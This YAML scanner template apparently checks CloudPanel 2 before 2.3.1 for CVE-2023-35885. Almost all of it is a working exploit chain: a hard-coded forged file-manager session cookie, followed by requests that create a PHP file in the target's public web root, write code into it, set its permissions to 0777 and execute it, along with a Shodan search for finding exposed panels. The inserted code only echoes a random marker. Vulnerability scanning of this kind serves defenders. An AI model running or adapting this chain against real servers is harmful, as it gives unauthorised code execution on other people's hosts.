id: CVE-2023-35885

info:
  name: Cloudpanel 2 < 2.3.1 - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.
    SHODAN: title:"Cloudpanel"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35885
    - https://www.datack.my/fallingskies-cloudpanel-0-day/
    - https://github.com/datackmy/FallingSkies-CVE-2023-35885
    - https://www.cloudpanel.io/docs/v2/changelog/
  tags: cve,cve2023,cloudpanel,kev,rce,instrusive
  created: 2023/07/30

set:
  session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY="
  str1: randomLowercase(10)
  str2: randomLowercase(8)
  hostname: request.url.host
rules:
  r0:
    request:
      method: GET
      path: /file-manager/
      headers:
        Cookie: clp-fm={{session}}
    expression: true
  r1:
    request:
      method: POST
      path: /file-manager/backend/makefile
      headers:
        Cookie: clp-fm={{session}}
      body: |
        id=/htdocs/app/files/public/&name={{str1}}.php
    expression: true
  r2:
    request:
      method: POST
      path: /file-manager/backend/text
      headers:
        Cookie: clp-fm={{session}}
      body: |
        id=/htdocs/app/files/public/{{str1}}.php&content=<?php echo "{{str2}}"; ?>
    expression: true
  r3:
    request:
      method: POST
      path: /file-manager/backend/permissions
      headers:
        Cookie: clp-fm={{session}}
      body: |
        id=/htdocs/app/files/public/{{str1}}.php&permissions=0777
    expression: true
  r4:
    request:
      raw: |
        GET /{{str1}}.php HTTP/2
        Host: {{hostname}}
    expression: response.status == 200 && response.body.bcontains(bytes(str2))
expression: r0() && r1() && r2() && r3() && r4()